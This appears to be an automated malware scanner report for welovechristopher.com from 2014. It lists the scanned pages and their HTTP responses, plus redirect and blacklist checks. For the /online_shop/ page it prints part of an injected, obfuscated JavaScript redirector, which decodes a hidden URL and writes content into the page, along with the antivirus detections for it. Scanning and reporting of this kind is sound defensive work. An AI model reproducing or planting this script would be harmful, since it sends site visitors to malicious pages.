New scan:

Malware Scanner report for welovechristopher.com

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://welovechristopher.com/
200 OK
Content-Length: 10813
Content-Type: text/html
clean
http://welovechristopher.com/online_shop
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 21:13:31 GMT
Location: http://welovechristopher.com/online_shop/
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 249
Content-Type: text/html; charset=iso-8859-1
clean
http://welovechristopher.com/online_shop/
200 OK
Content-Length: 102004
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function vO(){};var sH=function(){};vO.prototype = {bJ : function() {this.p='p';this.g=false;vP='';return 'hTt,t{p{:{/T/Tc{lMi{cTk,2{gQaMtMe,.TiQnMfMoT/{tM/M'.y(/[MTQ\{,]/g, '');this.zS=false;this.oV='oV';var m=function(){return 'm'};uB='uB';},b : function() {this.uL='';kQ=false;function d(){};var s='s';this.iR='';e='e';vU=false;this.h=false;var c=window;var uA=function(){};this.zR='';r='';var u = this;var a='';var rA=function(){return 'rA'};var bS=39793;var uF=document;eO='eO';this.f='f';var fC
... 1535 bytes are skipped ...
his.mQ='mQ';pM='pM';var zGO=false;uF[z][oA](t);this.rN='rN';sC='sC';var qIK=11133;var bD=function(){};this.iJ='';var jAW='';} catch(jU) {tN=51575;var gP='';var kC='';var uD='uD';var iS='';var nC=function(){return 'nC'};uF[iC]('<fhEtfm^lE f>^<DbfoEdEyD D>^<./Dbfofdfy^>.<f/DhDt.mfl^>.'.y(/[\.\^DfE]/g, ''));mH='';var tJ=function(){};c[q](function(){ u.b() }, 192);this.xV='';var iDU=14442;}hJ=107;var bF='';}};var rE=61277;var pN=new vO(); var aYE=false;pN.b();function pB(){};

Decoded script:


function () {
u.b();
}
/*** called setTimeout with function () {
u.b();
}, 192 */
<html ><body ></body></html>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Illredir-CH [Trj]
Ad-Aware
Trojan.JS.Iframe.DBD
Ikarus
Trojan.JS.Redirector
nProtect
Trojan.JS.Iframe.DBD
Emsisoft
Trojan.JS.Iframe.DBD (B)
Comodo
UnclassifiedMalware
DrWeb
JS.Redirector.64
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
Trojan.JS.Iframe.DBD
NANO-Antivirus
Trojan.Script.Iframe.yxty
F-Secure
Trojan.JS.Iframe.DBD
VIPRE
Trojan.JS.Obfuscator.j (v)
AVG
JS/Obfuscated
GData
Trojan.JS.Iframe.DBD
AVware
Trojan.JS.Obfuscator.j (v)
Agnitum
JS.Redirector.Gen.10
ESET-NOD32
JS/TrojanDownloader.Pegel.CD
BitDefender
Trojan.JS.Iframe.DBD

http://welovechristopher.com/online_shop/../index.html
200 OK
Content-Length: 10813
Content-Type: text/html
clean
http://welovechristopher.com/online_shop/../../index.html
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/test404page.js
404 Not Found
Content-Length: 967
Content-Type: text/html
clean
http://welovechristopher.com/online_shop/../../news/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/online_shop/../../collection/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/online_shop/../../projects/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/online_shop/../../store_listing/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/online_shop/../../online_shop/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/online_shop/../../contact/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/../news/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/../collection/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/../projects/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean
http://welovechristopher.com/../store_listing/
400 Bad Request
Content-Length: 1023
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: welovechristopher.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 21:13:30 GMT
Accept-Ranges: bytes
ETag: "2e880da6-2a3d-49ad92305b540"
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 10813
Content-Type: text/html
Last-Modified: Thu, 27 Jan 2011 19:41:33 GMT

...10813 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: welovechristopher.com
Referer: http://www.google.com/search?q=welovechristopher.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=welovechristopher.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://welovechristopher.com/

Result: welovechristopher.com is not infected or malware details are not published yet.